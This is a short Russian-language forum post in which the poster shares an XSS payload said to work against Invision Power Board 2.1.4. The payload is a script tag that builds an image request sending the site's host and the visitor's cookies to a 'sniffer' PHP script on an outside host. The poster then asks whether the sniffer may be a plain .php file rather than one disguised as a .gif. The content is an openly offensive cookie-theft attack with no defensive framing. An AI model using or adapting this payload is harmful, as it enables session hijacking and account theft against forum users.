def_ ок понял значь правильно мыслил

А вторая часть вопроса...
лазил по форуму нашел под версию ipb 2.1.4 эту xss
<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>

вот немогу понять обычно сниф сам скрипт замаскирован под gif
а вданной xss получается можно даже его изменить на php и тоже полетат куки ?!